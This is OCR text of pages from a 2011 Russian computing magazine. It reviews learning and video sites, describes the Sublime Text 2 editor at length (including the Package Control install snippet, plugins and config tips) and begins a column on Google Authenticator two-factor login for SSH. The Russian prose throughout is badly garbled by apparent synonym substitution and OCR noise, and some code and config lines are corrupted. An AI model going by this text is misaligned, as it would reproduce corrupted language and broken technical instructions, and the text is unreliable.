наконец-то, авторитетно прокачали. Так, наличность задач кайфовый вкладке

нолить держи систему. :Х:

«Processes >> днесь изобразительно делится в категории: приложения и фоновые процессы. Как да прежде, с целью каждого отображается коли­ чество потребляемых ресурсов- процессара да оперативной памяти, но в настоящий момент кроме того отображаются до этих пор индикаторы дисковой и сетный активности. Причем ячейки на таблице меняют краска во за­ висимости через интенсивности использования ресурса, того моментально

видно, идеже «гад сидит » :] . Прожорливый эксплуатация тутовник а не возбраняется не просто выгрузить, хотя до настоящий поры ... перезапустить !просто, же в качестве кого удобно!]. Утилита <<Performance » и получила абсолютно свежеиспеченный внешний облик на стиле Metro Ul, равно диаграммы потребления разных ресурсов ныне повыше всяких похвал. Впервые появилась супинатор <<Арр

History»: сверху ней отражается статистика используемых тобой при­ ложений. Причем на каждого подсчитывается суммарное количе­

ство потребления !например, процессарного времени] . Вероятно, эти данные могут бытовать полезны, дабы оптимизировать эпоха работы

через аккумулятора !отказавшись через каких-то одиноко требовательных к ресурсам приложений]. Вкладка <<Startup » должна была народиться

028

Попр об томбуй найди кнопку для того выключения

ХАКЕР

01/154/2011


n -60 , • • ,

GnhlgSIIIIN_PfoOo....,. • L - 0

,

}

0

~

s •

0

~ ~

CODECADEMY www.codecademy.com Каждый, который изучал только язычина программирования, знает, каким утомительным

Confirm or Deny

может конституция зачитывание засушливый литературы. Хочется попытаться новые познания после этого да сейчас,

"' '· ~·Dooor

., ;r. c,.... ,_o-

неграмотный прыгая туда-обратно ото чтения для реализации примеров. Недавно появившийся стервис

", ........... '""' ., ..... 01)'•-111'

Codecademy (академия программирования) пытается принять решение эту проблему, предлагая

••••••"'"•·-·--~

0)'11018 &.1• •~1 ·-·-··-- ·

... . .." , ••••••• ,тrРС•а.

rон .... , ... ж~J-.. . . ""-•t-н.-· "' •~•

- • -.ot• •••

диалоговый интерфейс для того обучения программированию (пока всего JavaScгipt) . Идея -сделать дело максимально интерактивным . Теория выдается архи маленькими

•1

порциями, же становой хребет : ее враз предлагается проэкзаменовать на интерактивной консоли. Пока не поймешь равно малограмотный сделаешь постоянно правильно, обслуживание отнюдь не пустит возьми последующий шаг. Академия следитза прогреесом равно выдаетнаграды подобно Fouгsquaгe . И нтерактивны й уч е бни для nро г р амми рован равно ю

SHOWMEDO

Ш Most Viewed Video Tutorials

во

~-;~:..

OpenStreetMap lntroductfon

Leltrn Ojanao: crute а Wlklln

steve

TOI)ICS cover ed

Siddhi lnthis tutone l, I •ntroduce the besics of DJango Ьу wa lking you throughthe

tndud e us{ •.. )

development { ... )

А.

tntrvduttion to using e nd getting st:erted W!th Opt:nStre etМ ap.

0~А

first Jltva

progrllm fn John Montoomery In this ShowMe OO John dernonstrates how tocreate е projecttn Edipse, thenwnte and run ( ]

...

-

~ -

0-zip cornpress files

Oat how to c:ompre ss files us•ng 0·ZIP

showmedo.com

Есть до этого времени единолично сноровка выучить азам(!) программирования, отнюдь не заглядывая на мануал. Суть хорошо иллюстрирует бабушка добрая присказка «Лучше сам в один из дней увидеть, нежели сто присест

ощутить » . Есть полно сервисов (вроде peepcode.com иначе говоря dest гoyallsoftwa гe . com ), которые за н ебольшуюденежку предоставляютдоступ для неплохо снятым скринкастам, во которых гуру-кодеры делятся решением конкретных задач. Видео со живым человеком -это поуже не сухая статья, а наглядное видео не без; комментариями понимающего человека . Что называется , смотри равным образом учись. ShоwМеDо-этотоже свод видеокасто на пользу кого программистов, хотя разви­ вающийся после отсчет энтузиастов, а вследствие чего получи 000% бесплатный. В приоритете Pythoп : только для н егоздесьвыложеноболее600роликовнараз н ые т емы.

В да део ко асты с целью оборона граммистов

SECURITYTUBE www.secur jtvtube.net Раз уже ты да я заговорили относительно скринкасты, от нашей стороны погрешность безвыгодный перечислить профильный pecypc-SecuгityTube . Это, бесспорно, самый великий агрегатор видео нате тему инфор­ мационной безопасности. Да, туттысячи трешовых роликов, снятых индусами сверху кривом

_.,-.

......... _

английском равным образом показывающих, что привести в действие Metasploit. Ну да ладно. Зато после этого а хостится огромное цифра видео со различных конференций, скринкастов ото известных людей на

fllt~Uc-

области ИБ, сотни демонстраций различных техник, сплоитов, X-Toolz равно РоС' в отношении в. Естьдаже

~ - -- (Jiкtll• )\)10)

.,

Ро

целые тематические подборки ви д ео, держи п ример, объединение ауд иту враг пр оводных сетей. Кстати,

,,..,..,29_..... _

...... ....

разве поискать, ведь нетрудно находятся равным образом некоторые люди наши Vis uaiHack++ :).

Аггрегатор хак -в равным образом део

0 ' r _н _t(tl_t 0 _11 0 _ ,-, _ 11\ " - \ 0 0 - - 01 0 0 0 0 0 t\ \1 1 \\\11 ttttl 1111111\ 1_1~,_,_11 -=11_11_1_1-

v

,_:_,..:._1 '-"-'

[!!!!)

НЦ11 -'11"'~~~~·.

hЬ11CI

0 0 1 1

DJU\If A8otJТ

ASCIIFLOW www.asc jiflow.corn

rJ

~~~~~~~~~

Очень смешной сервис. По сути, сие вычитчик блок-схем, так не без; одним огромным отличием от, например, Visio . Вместо обычных графических элементов после этого используются исклю­ чительно символы изо Аsсii-таблицы. П олучается целебный Ascii агt. Доступных элементов

0 ••ж•а~ tlooo 1 1-------------------1

'' 1

...,''

-----~·

0 1 1 1

0 1 1 1 1 ·---------·----·----·

____ _L_________ '

___ t t 1 1

нонче безграмотный ахти много, так даже если существующего набора достаточно, воеже изобразить слож­ ные блок-схемы . Элементы по прошествии появле н ия нате полотн е н е п р евращаются внеу п равляемый набор символов. Их не грех перемеща т ь, обозначать крыша меж д у ними не без; п омо щ ью интерак­

________L_____.

тивных стрелочек. Зачем нужны Аsсii -диаграммы? Д а ни вслед чем:). Нажав получи и распишись ко н опку «Ditaa!»,

'

твоя милость получишь поуже нормальную графическую схему.

Ре д диверсия шум бло к- из х е м

ХАКЕР

01 /154/20JJ

029


PCZONE

Стёпа

«Step» Ильин [twitter.com/stepahl

SuЫime Text 0, ИЛИ кунг-фу КОДИНГ ПРАВИЛЬНЫЙ РЕДАКТОР КОДА ДЛЯ ПРОГРАММИСТА Если бы полгода отворотти-поворотти меня попросили научить

• Форум

вычитчик кода, так около

не без; больш им

n

числом

олно ц енного релиза SuЫime

www. suЫ j mete x t .

Nukem

шn.lf=

вторую версию

а подо Мае- неправдоподобный

TextMate.

Сегодня ваш покорнейший слуга ответил

бы по всем статьям : SuЫime

Text 0. И

никак не

лишь только благодаря этому в чем дело? дьявол кросс­

limeText:

Полезные плагины :

никак не было, да от каждым

работч ики сильно взялись следовать организация убийцы

Windows автор этих строк бы предложил Notepad++, перед Linux- gedit,

обсужденийя и плагинов про Sub-

Text 0 сызнова

новым билдом вычитчик обрастает новыми фишками . РазTextMate,

какой п ользуется бешеной популярностью внутри программистов под Мае, однако издавна от начала до конца отнюдь не обнов ля ется. Поклонники шутят:

Duke

Fогеvег равно оный вышел раньше, нежели п ользователям п редложили

TextMate. Вокруг SuЫime Text, напро т ив,

собирается

большое сооб щ ество программистов . Их легко и просто понять: когда-никогда привыка­

wboпd . пet/suЫime

е ш ь ко по всем статьям фишкам, предлагаемых редактором, не без; т рудом представля­

~

ешь, на правах минус них обходился ра н ее. Редактор радует просто всем, а если отчего-то да безграмотный хватает, в таком случае сие минус труда не возбраняется свести из помощью расширений, которых становится всегда пуще равным образом больше, ещё но за счет профессионального сообщества. По иронии судьбы, работает дьявол

платформенный, а оттого почто

неграмотный исключительно около Мае, а подо всеми популярными платформами. И сие одна

сие супер-редактор не без; целой

изо главных его киллер-фич .

дюжиной убойных фич .

КРОСС-ПЛАТФОРМЕННОСТЬ Text отроду бы невыгодный завоева л такого склада популяр­ ности, разве бы неграмотный разрабатывался с целью Windows, 05 Х да Linux одновре­ Что ни говори, а SuЫime

менно. Работая около разными системами, лишше малограмотный нужно использо­ вать целенький зверильница разных текстовых редакторов, переключаясь с SuЫime

Text 0. Интерфейс лещадь Мае

одного интерфейса получи и распишись видоизмененный да вспоминая горячие фортепьяно [а какой кади н г лишенный чего хоткеев?J. Секрет кросс-платформеннысти более или менее кроется в пл атформе разработки, которую выбрали создатели редактора. В это мудрено поверить, а SuЫime написа н в

Python'e!

Можно хоть

отдать все силы комбинацию Ctгl- · [тил ьд а!, чтоб во нижней части редактора появилась п олноценная Руthоп-консоль. С через

Python 'a мож н о API,

нате лету распоряжаться поведением редактора: лакомиться специальные

которые используют соз д атели подключаемых плагинов. За кросс­

пла тформенное везет не без; Python'oм в глубине разработчики хоть не требуют денег. Точнее говоря, просят, так малограмотный требуют. В т ечение несгра­ ниченнога триала, SuЫime только что часом полноте напоминать: «Раз ужак твоя милость

что-то около давнёшенько пользуешься программой, следственно быть, кушать после почто подать

$59

долларов его разработчику?>>. Очень чистосердечно .

УБОЙНЫЙ ИНТЕРФЕЙС Интерфейс SuЫime дозволяется любить, а мож однако ненавидеть. Он малограмотный похож ни держи зачем другое. Разработчики подо шл равным образом ко этому вопросу творчески,

стараясь исполнить оный п уть работы не без; текстом, которые самочки считают правильным. Тут пропал тулбаров равным образом не вдаваясь в подробности лишних элементов интерфей­

са. Толь ко адрес да его уменьшенная ради екция [мини-карта! , отображаю-

030

ХАКЕР

01/154/2011


SuЫime

щаяся из правой стороны. Оформление вкладок справедливо подсмотрено

Soda

Text 0,

тож кунг-фу кодинг

light.suЫirne-theme

у Chгome . Отступы равным образом ограничения блоков веско выделяются едва заметными пунктирными линиями , наравне сие реализовано на

Notepad++.

А на качестве цветовой схемы соответственно умолчанию используется брутальный темный вариант, что никак не п ременно приелекает заинтересованность тех, кто такой

0 (- Sod;~ ~k.subl!mc ~ theme

soda light

• FOLDERS .. Themt - Soda

заглядывает во щит твоего ноутбука. Вариантов цветовых схем-

невежественность тьмущая, пай изо них позаимствована с

TextMate.

з 01 4 01 TABS

003 Soda

s

077 Widget- Soda L lg ht . suЫime-settlngs

По началу

01 (

безграмотный замечаешь каких-то мелких деталей, хотя со временем начинаешь

уважать проработку мелочей . При выделении текста совершенно пробелы и но бог приятственно скругляются. Подсветка синтаксиса понимает, сколько

JavaScгipt, дай тебе расписать равносильный код. Всего изо коробки

Sodt~

Llght. subllme- мшng.s

Ught unThtmt

background.png· •, • \eye rG.inner_llarotn": (1, 0 0, "\eyere.opecity": 0.е , "content_tllargin": (3, 0, 0, 0), "teb_over\ep": 04 , •teb_width": 088 , tab_tllin_width ~ : 08 , "teb_height": 08

"17

поддерживается значительная языков программирования : С, С++, С#,

08

CSS, О, Егlапg, HTML, Gгoovy, Haskell, HTML, Java, JavaScгipt , LaTeX, Lisp, Lua, Maгkdowп, Matlab, OCaml, Регl , РНР, Pythoп, R, Ruby, SQL, TCL, Textile да XM L. Никто малограмотный мешает со болтать дополнительные схемы иначе говоря

Soda Ught/Widget- Sod.a

077 Wldget- Sod1. Light.tmTheme

~е-кt:-,-,.-::.. :--:: .. Тh:-,.. --_ 0so< ~a-.t7 so":'d,-u :-:-: ,h:-t/:t--: ,.-,.-:-,_--'

01 12 13 14 15

интересах подеветки Н Т МL-исходника может пенадобиться единаче да проект пользу кого

~

Llg ht .suЬiime-theme

Ught. subllme~thtmt

Soda UghtJWklgtt-

00

знаки табуляции выделяются спецсимволами , а уголочки незаметно,

Soc111

IJ

},

насобирать свою собственную.

МИНИ-КАРТА КОДА Рассказывая об интерфейсе SuЫime, невмоготу малограмотный встать держи

Альте р н а ти вная да оч ен ь удочка чн ая т ема

Soda

некоторых ноу-хау. Например , мини-карте стих , которая, в качестве кого по слухам

самочки разработчики, показывает исходник не без; высоты

00 000 футов.

Это

КОМАНДНАЯ ПАНЕЛЬ Textmate, на SuЫime Text лакомиться

узкая обшивка из правой стороны, получай которой выводится масштабируемая

Как равным образом во

материал текста. Здесь не соответственно плечу дебатировать самоуправно текст, хотя з ато приёмом

ловкий инструмент, какой-никакой вызывается путем листок

видна строй документа . И за единый вздох понятно, какую кусок сорца твоя милость ре­

хоткеем Ctгl

дактируешь. Можно позвать на интересующее полоса карты- да SuЫime

ли твоя милость засадить сниппет, призвать макрос, реализовать реорганизация

покажет нынешний ломоть кода. Кто-то может спросить: а на хренища зто н у жно?

текста [например, свести всегда буквы во ЗАГЛАВНЫЕ!, - всегда сие

Лучший сноровка отреагировать нате настоящий проблема -открыть во редакторе обложка

допускается учинить при помощи Commaпd

слыхать этого: pasteЬiп . com/гaw.php?i=7356гOZM

набираешь начальные символы названия элемента [скажем, сниппета

:1. Кто-то, возможно, равно

командная плита . Это супер­

<<Tools>> или + Shift + Р [в Мае: Shift + Commaпd + Pl. Неважно, хочешь

Palette.

Просто нажимаешь хоткей,

напротив подоб н ых наворотов, только непосредственно ми , по части ощущением, мини-карта

Tгy/Exceptl- равным образом SuЫime показывает нужные варианты .

истинно помогает на навигации в области документу. д если бы эффектив­

кания-и любые сниппеты твоя милость вставляешь на

ность увеличивается взять в банан процента , так вследствие этого бы да нет?

03

0 минут привы­

раза быстрее, нежели коли

бы сбивалея да ковырялся мышкой на меню. Причем элементы, выво­ дящиеся держи командной батман н ели, подстраиваются около молодчик файлов: с целью

РАЗНЫЕ РЕЖИМЫ ПРОСМОТРА

ру-исходника малограмотный бросьте лишних сниппетов, за вычетом заготовок чтобы Pythoп .

Для тех, который льнуть к чему ко максимальном у минимализму, очищать близкие

плюшки: во п ервую очере д ь, власть « Distгatioп Fгее Mode >> [Shift + F111.

GO ANYTHING

Вот уже идеже безграмотный хорэ никаких отвлекающих факторов- только лишь твоя милость равно код.

Другая батман н ель, в отношении которой прочие редакторы могуттолько мечтать, на­

SuЫime

зывается

Text скрывает начисто

однако азы редактора да ОС. Можно

«Go Anythiпg >>.

Название неграмотный врет: симпатия всерьёз помогает

привыкать минус фанатизма- заниматься во полноэкранном режиме, кото­

перешагнуть на документе ко чему нужно . Вызывается горячей клавишей Ctгl

рый тоже позволяет эксплуатировать кажинный пиксел экрана , а подле этом

+ Р [Мае: Commaпd + Pl. Далее принимать варианты . Можно нанять номинация

вместе с по отношению х раняя удобные панели редактора, модильон равно мини-карту редактора.

файла, так чтобы разинуть его . Поиск осуществляется по части открытым файлам ,

На кино быстро выводятся порядочно файлов одновременно, доста­

файлам проекта, а вот и все без году неделю закрытым документам. Результат твоя милость

в точности только что избрать посредством каталог

[«View -7 Layout >>l п одходящую сетку.

При этом перекидываться в ряду такими панелями дозволяется архи несложно не без;

получаешь мг н овенно, по мнению мере набора маски, аж коли во п роекте

000 документов! Набирай на закраина

через горячи х клавиш.

Хочешь перевалить для нужной

":le". Вводим

00 строке

00

на текущем файле?

символ"#" равным образом осуществляем безыскусственный

развертка до текущему файлу. Причем SuЬiime вмиг отображает в списке подходящие по-под условие элементы. Отдельно хочу изменить

заинтересованность бери отыскивание до символам [переменным, функциям, классам!. Для

Pac kage Co ntro l:

сего строку поиска потребно приступать со символа образом, выискать

равно перешагнуть ко нужной функции- сие брат нажатий держи клавиатуру [кстати,

Package Control: Add Repository Package Control: DJS,,t)!e

Pac~aCJe

Package Control: Drsco\·e: Package Control: Er1,1!Jie Package Control:

пользу кого поиска за символам дозволяется за единый вздох пустить в дело хоткей Ctгl + Rl. И здесь заново но работают подсказки равно автокомплит. Механизм невыгодный всего лишь

P,,c~,1C:CS

быстрый, да да умный. Например, даже если определить tpГcJгf, наша сестра сможем переме­ ститься для функции

Рзс~мн?

том, почто SuЫime

Package Control: _rs t Packages Package Control:

read_file

открытого файла

text_parser.py,

а

tp:1ee

перенесёт для 000-й строчке того но файлаl Секрет быстрого п оиска на

Jпstall Pac~,,ge

Text

на фоновом режиме подгружает файлы , которые не без;

великий вероятностью понадобятся тебе умереть и безвыгодный встать пора работы.

Rе:·ч~\·е Р.к~.1се

МНОЖЕСТВЕННОЕ ВЫДЕЛЕНИЕ

Package Control: L'pg:."c'e Рас~а~е Package Control: Acic Reposrto:y C:ыtl"el Package Control: Crea te Pac>:age F1!e

Еще одна улетная фича. Суть на том, с намерением малограмотный уделывать одного сукна епанча из­ менения

00 раз,

а деять

00 изменений

разом. Ты можешьустановить

указатель на разных местах страницы- да набираемые символы будут ду­

Package Control:

c~·catc БР 0 (l:-у P.:lC~Jgc ~l!e

Package Control:

L ' p<:н a cie;O\ е:•:.лtе

A!i Pac~.1ges

блироваться кайфовый всех выбранных областях. То, ась? когда-то приходилось выполнять со через регулярных выражений иначе говоря поиска со заменой , теперь на каждом слове быстрее произвести сквозь множественное отчеркивание .

У пра во зеамет ие nа кета ми

ХА КЕР

01 / 054/ 0011

Самый беспритязательный вариант- нетрудно урвать

Alt [или Commaпd подина Мас'омl

031


PCZONE и после шумнуть на тех местах документа, идеже нужно разместить кур­

сор. Или облюбовать объединение строк равно придавить Shift + Ctгi/Commaпd + L-текст будет заимствовать сверху каждой изо них . Но удобнее просто-напросто иной режим, по­

зволяющий отредактировать похожие круги (названия функций, переменных равно т.д.l Для сего желательно вселить стрелка сверху нужном слов е и затем серия присест выложиться Coпtгoi/Commaпd +О. Каждое нажатие­ каждое новое <<захваченное >> въезд сего слова. Можно зараз по­ ставить специальный указатель кайфовый всех вхождениях нужного слова. Это

делается нажатием

Alt + FЗ подо виндай равным образом Ctгi+Commaпd+G почти маком.

АВТОМАТИЗАЦИЯ Множественное выделение- отнюдь не беспримерный образ сэкономить время держи операциях из текстом. К твоим услугам артистично реализованные функции поиска равно замены. Рутину могут автоматизировать макросы ,

которые позволяют протоколировать образ действий от текстом, а дальше их повто­ рять. Есть пока что одна похожая опция- слепок последнего действия. Если порыться во список

Edit, так найдешь сызнова изрядно интересных

опций интересах редактирования. Например, сортировку текста тож наоборот перемешивания строк . Для проектов получи С++ глотать фишечка переключения

в кругу хедером равно файлом со реали з ацией- Alt-0 (File-Swap Неаdег/

lmplemeпtatioпl . Само собой, доступна концепция сборки . Поддерживают­ ся проекты, написанные на: О, Егlапg, Поиск реализован архи ужас до чего равным образом поддерживает регулярные выражения

Haskell, JavaC, Make, Pythoп , Ruby.

ПОДДЕРЖКА ПЛАГИНОВ Возможности редактора легкопрокачивается из-за контокоррент подключаемы х

плагинов (которые, по образу равным образом самовольно редактор, пишутся получи Pythoп'el. Е от ли еще далеко не где-то издавна дополнительных танцевальный шаг кетов было отнюдь не эдак много, в таком случае

в эту пору лакомиться изо почему выбрать. Сказывается стремительное развитие редактора равным образом ошеломляющий завоевание у программистов, которые рину­ лись воплощать в жизнь те фишки, которые они использовали на других

редакторах равным образом далеко не нашли изо коробки на SuЫime

Text. Вместо того с целью

ручной обкатывать исходники аддонов равно расквартировывать на нужных дирек­

тория SuЫime'a, удобнее использовать в своих интересах специальным менеджером

шаг кетов. Он доколе недоступен по мнению умолчанию (уверен , в чем дело? временно), но лично реализован во виде подключаемого движение кета. Чтобы найти

SuЫime

Package Contгol , нужно выявить внутреннюю ферма при­

ложения (напомню , аюшки? сие настоящий Руthоn-интерпретатор) и вставить тама соседний сниппет заключение :

import

urlliЬ2,os;pf='Package Control.suЫime-pac kage' ;

ipp=suЫime.iпstalled_packages_path();os.makedirs(ipp)

if

поt

os.path.exists(ipp) else

Nопе;

opeп(os.path.joiп(ipp,pf), ' wb' ).write(urllib2.urlopeп(

'http: /_/ suЫime . wboпd . net/ ' +pf. replace ( ' ' ,

' %2е'

) ) . read ())

После перезапуска приложения во разблюдовка т ы найдешь пункт << Pгefeгences ~

Мультивыделение

ВАЖНЫЕ ДОПОЛНЕНИЯ ДЛЯ

0

SuЫimeCodelntel b jЦ y/a5LzZE

0

Package

сопtгоl >>. Если наметить во появившемся карточка

SUBLIME ТЕХТ

suЫime-text-2-git

bjt .ly/r!na50

0

Clipboard history bjt .Jy/ratKEu

'

Mote Ьit.ly/mPieAO

Автокомпли~реализованныйв

Из коробки SuЫime никак не поддер­

Полезноедополнение,которое

SuЫime до умолчанию , безвыгодный сверх меры

живает интеграцию от системами

в середке SuЫime Text реализует исто­

ровать файлы в области протоколам sftp/

крут. Подключив данный плагин, твоя милость по­

контроля версий. Но сие промах

рию изменений на яички обмена

ssh2,предоставляямаксимально

лучишь всю мощь технологиия

Code lntelligence с известного Komodo

давноисправили энтузиасты, вы­

(аналог Oittol, позволяя бойко

прозрачное сольватация от фай­

пустив соответствующие плагины. С

адресоваться для любому с элементов.

лами в сервере . Имей на виду. сколько

Editoг. Это отнюдь не всего только строгий

через сего аддона твоя милость сможешь

Причем на историю попадаюттолько

ради работы ему необходимы бинар­

автокомпли~ноидополнительные

нести протоколы и заботы вместе с репазитариями

те сниппеты кода, которые твоя милость занес

ники известного клиента

подсказки быть наборе кода, а вдобавок

Git. Аналогичные поглощать равным образом для того SVN, да

изо SuЫime Text равно всего лишь в соответствии с горячей

на правах на поддержания соединения,

удобная мореплавание посорцам.

Meгcuгial .

клавише (Ctrl +С) .

приблизительно равно генерации ключей .

032

Этот плагин позволяет редакти­

ХАКЕР

PuTTY-

01 / 054/2 011


SuЫime Text 0, или — или кунг-фу кодинг

ПОЛЕЗНЫЕ ТИПСЫ Если SuЫime Text невыгодный может устроить

0

Если твоя милость немалый фанатVi'а, в таком случае тебя осо­

кодировку файла, так симпатия механично

0

выбирает Windows 0252. Конечно,

беннодолженпорадоватьспециальный

«Vintage Mode ». Он vi и все удобные фичи Sublime Text'a, начиная авто­ выделение. Этот работа no умолчанию отключен ,

позволяется обнаружить обложка заново, принудительна

строй редактора

которые идут с коробки, но, разве хочешь что-то

воеже далеко не nугать неподготовленных nользовате­

Soda [ естьдве вариации -светлая равно темная!. 1. Скачиваем .ziр-архив со GitНuЬ-странички про­

лей . Чтобы активировать его, придется распахнуть

сего нужно ввезти минимальные изменения

конфиг <<Pгefeгences

во конфиге [Pгefeгences

menu item » равно припрятать naкeтVinate изо списка

-7 File settings Defaultl.

-7 GlobaiSettings -7 Default

игнорируемых [выключенных nа кетов!, поnравив следующую строчку:

"fallback_encoding" : "Western (Windows "ignored_packages" : [ "Vintage" ] 1/ было "ignored_packages" : []

0252)" , И меняем ее, соответственно, на:

Можно поиграться из другими темами,

nозволяетобъединить nривычные команды

выбрав кодировку IFile -7 Reopen with encoding -7 Windows 02511, же сие бурно надоедает. Правильнее понудить Sublime облюбовать по умолчанию безграмотный Windows 0252, а Windows 0251. Для

Находим в дальнейшем строчку:

0

На муж вкус, стандартная тематика оформ­

ления Sublime Text больше всяких похвал.

// из чего можно заключить

особенного, рекомендую нестандартныетемы

екта I Ьit.ly/niMqТ7 0

0. Распаковываем файлы на каталогТhеmе -7 Soda равным образом помещаем ее во папку Packages внутри Sublime Text. 3. Далее активируем схему, проnисывая ее на на­ стройках IPгefeгences -7 Useг GlobaiSettingsl. В зависимости оттемы: светлой [Soda Light . sublime-themel сиречь темной [Soda Daгk. sublime-themel, вставляем нужную строчку в конфиг:

"fallback_encoding": "Cyrillic (Windows 1251)",

Перезаnусти Sublime. Нажми ESC.- если в статус-баре nоявилась знакомая эпитафия

"theme" : "Soda Light.sublime-theme"

INSERT MODE, значит, однако заработало :1.

loaded 037

зn~pr;et.з

>>> .1r.-.pc:rt

З'iЗ

>>>

ПРОЕКТ

S'.r'~ .'le:r~.l'.Jn

'2 .6.5

(:r265:790Эб,

Mar 09 0010 ,

01 : 08:26)

/ИSС

'.'.1500 02

Ьн

(Int.el))

Не могу безвыгодный пахвалить то, в духе во редакторе реализована построение nроек­ тов. В проекте nолностью бэкаnится средства редактора, включительно всё-таки

J.rr,por-: ur lllb2, l1n~

о..з:рf=-

'Package Control .

.зuЬlнr.е

packaqe ' ;

033, Column 04

Spact~:

измененные да несохраненные файлы. Если тебе одновременно nо надобилось .1.рр-=зuЫны!. J.n~t;

0

Python внутри. Открываем кронштейн

nереключиться возьми видоизмененный nроект, твоя милость ... nросто тама переключаешься. Например, вследствие ту а движение н елка «Goto Anything >>. Переключение проис­ ходит мгновенно. Без лишних лагов равно червонец вопросов подобно «Хотите

ли соблюсти изменения? >> [потому что-нибудь всегда изменения сохраняются ав­ томатически!. Когда твоя милость на вытекающий крата откроешь проект, до сей времени хорэ во

«lnstall packet >>, ведь твоя милость увидишь перечень аддонов, доступных с целью установ­ ки. Менеджер шаг кетов самовластно не без; качает всё-таки файлы равно разместит их на нужных директориях- тебе остается всего лишь облюбовать пакет.

томик но виде, что-то равным образом рядом закрытии. Чего тогда лишние вопросы задавать? :1. Чтобы прибросить файлы на проект, шабаш перетаранить их бери

сайдбар lпанель слева!. Заметь, безвыгодный вскрывать !что не раз невыгодный нужно! фай­ лы, а без труда прилинковать нужные с них, добавив на прейскурант . Можно

ZEN CODING

даже если перетаранить целую директорию- SuЫime

Text обработает всё-таки

Чтобы испытать всю мощь, которую предоставляют плагины, предлагаю

сразу. Сайдбар- сие суммарно баста уютный приспособление для того изуче­

включить сверток Zen Coding. Этот аддон реализует вилявый метода

ния кода. Если позвать согласно какому-то с файлов проекта, ведь вычитчик

ускоренного написания

отнюдь не короче вскрывать 053-ю ненужную вкладку, а не мудрствуя лукаво отобразит ее.

HTML равно CSS кода, которым моя особа давнёхонько пользуюсь.

Идея заключается во применении специальной системы аббревиатур равно

И на самом деле: с экой сие радости нужна вкладка, буде нужно прямо как бы посмо­

краткой еженедельник кода, которые соответственно определенным правилам «раскрыва­

третья часть среди документа? Если но твоя милость хочешь готовить к печати документ,

ются >> на настоящий шифр . Суть выгодно отличается всего делов объяснит пример.

соответственно файлу нужно призвать дважды. Это удобно.

div#page>div.logo+ul#navigation>li*З>a

РЕЗЮМИРУЮ Из таких маленьких удобных фенек равно состоит цельный Sublime Text.

Наnисав настоящий код, нажимаем нехитрое килоом ба бери клавиатуре

lctгl+space, равно как к автодоnолненияl равно nолучаем соседний результат:

Если попытаться инвентаризовать программу на двух слова, так моя персона бы назвал ее редактором-убийцей. Она работает лещадь разными системами . Из короб­

ки предоставляет порядочно уникальных фич . Разработчики смело

<div id="page" > <div class="logo" ></div> <ul id="navigation" > <li><a href="" ></a></li> <li><a href="" ></a></li> <li><a href="" ></a></li> </ul> </div>

реализуют лучшие из лучших фичи с других продуктов, по полной обойме поддерживая

миграцию [реализовав, например, поддержку бандлов TextMatel. А те фишки, которых программистам безвыгодный хватает, неоднократно появляются реализованными на виде плагинов. Успех пугает состоявшихся игроков

рынка. Даже заскучавшие создатели TextMate'a засуетились перед напо­ ром укрепляющегося конкурента, пообещав впредь до конца лета выпустить новую ветку своего продукта. Да, у SuЫime лакомиться отдельный проблемы,

которые могут испугать- одолжить пусть бы бы нужда лесбиянствовать в текстовых конфигах. Но моя особа еще из трудом представляю работу без участия сего

Освоив куда простые nравила [ Ьit .l y/pEAGgU I, твоя милость ускоришь разработ­

быстрого редактора не без; классным интерфейсом, системой сниппетов,

ку разметки на разы. Вот хорошая изъявление : Ьit . ly/pipbЗU . Поверь, сие

удобным поиском равным образом панелям

оный самый случай, если скорее безраздельно крата увидеть, нежели сто единожды увидеть.

держкой zencoding. Рекомендую.

ХАКЕР

01 / 054/ 0011

«Go То Anything >>, мультиселектом равным образом под­ I

033


PCZONE КОЛОНКАРЕДАКТОРА

Про двухфа кторную ав т оризацию

дляSSН смело могу д ат ь т ебе параль д л ваш покорнейший слуга из на оего акк а унта получай

автор этих строк

Gmail.

0.

Пробуем компилировать:

В с дьявол : H dfkлj2 . Я в точности з н аю, ч так твоя милость н е сможешь получить доступ для почте без участия од н оразового ключа , тот или другой генери­

c d goog l e - authe nti cator/libpam/

рует специальное приложениена моем телефоне. И сие по причине

$ sudo make

двухфакторной авторизации, которую может вобрать с головы в настройках своего Gооglе-аккаунта. Но исполь з овать сходящийся ин­

Е сли монтирование вывалится не без; ошибкой, так приходится отредактировать

не без; трумент всего лишь д л пишущий эти строки входа на

Makefile lпатч дозволительно посмотре т ь здесь: Ьit . l y/g7ays JI .

GMail порядочно скучно. Поэтому днесь

моя персона хочу объединение д ели т ься вместе с тобой, в качестве кого пишущий эти строки прикрутил эту но со амую систему чтобы

0. П ереносим устройство pam _ google _ authenti c atoг.so на / lib /secuгit y/, а

без п асного входа нате мои SS Н -серверы.

google-authenticatoг во / usг/Ьin.

Итак, двухфакторная аутен т ификация. Идея заключается на фолиант , чтобы умножить ста н дартную схему авторизации « лаги н- движение значимость >>

дополнительным одноразовым клю ч ом. П оследний генерируется

0.

специаль н ым мобильным приложе н ием Google Authenticato г (ес т ь

Д алее добавляем строчку на /etc/pam.d/sshd, дай тебе SSН-демон под­ гружа л получай ш РАМ-модуль :

версии ради iPhone, A n dгo i d, BlackBeг г y l нате основе открытых алгорит­ мов да спе ц иа льн ого ключа, кто снедать у программы-генератора равно

auth r equired pam_google_auth entic at o r. so

Google. Когда стервис п росит ввес т да од н оразовый ключ, н литоринх н об ввес т и И обновл моя особа ем конфиг /etc/ssh/sshd_co nfig:

цифры вместе с экрана те л ефона- равным образом портал осуществлен. Если но ключа нет, то заглянуть на почту т ы безграмотный сможешь, п усть д аже у т ебя откуд а-то вкушать

nрав да ль н ые л аги н равным образом п ара л ь (например, индивидуальность сказал тебе их лично , как лишь почто из д елал я Н адо сказать, ась?

Chal lengeRespo nseAuthent ication yes

:1.

Google развивает равным образом дею двухфакторной автори­

0.

зации во п р авиль н ом н а п рав л ении . Исход н ики моби л ьных п риложений

Все, те n ерь всё-таки подключено. Осталось настроить саму д вухфактор ­ ную авторизацию , сгенерировав приватный ключ:

откры т в рассуждении д оступ н ы, а на качес т ве алгоритмов используются чер н овики

альянса ОАТН (ln itiative fог Open Authe nti cationl, кто поддерживают

$ goog l e - aut hent i cat o r

многие известные ве н дары lв фолиант чис л е Symantec равным образом VeгiSignl. Н что касается в чем дело?

https://www . googl e.com/c hart ?chs=200x2ee& .. FBPWIL6PRYLVBQ Yo ur new secret key i s: YO FBPW IL бPRY LVB Q

до этих пор больше важно: п омимо утилит дл автор этих строк ге н ерации кодов ,

Google предла­

гает е щ е равно вторую дробь системы, кото р ая сии самые ключи п роверяет.

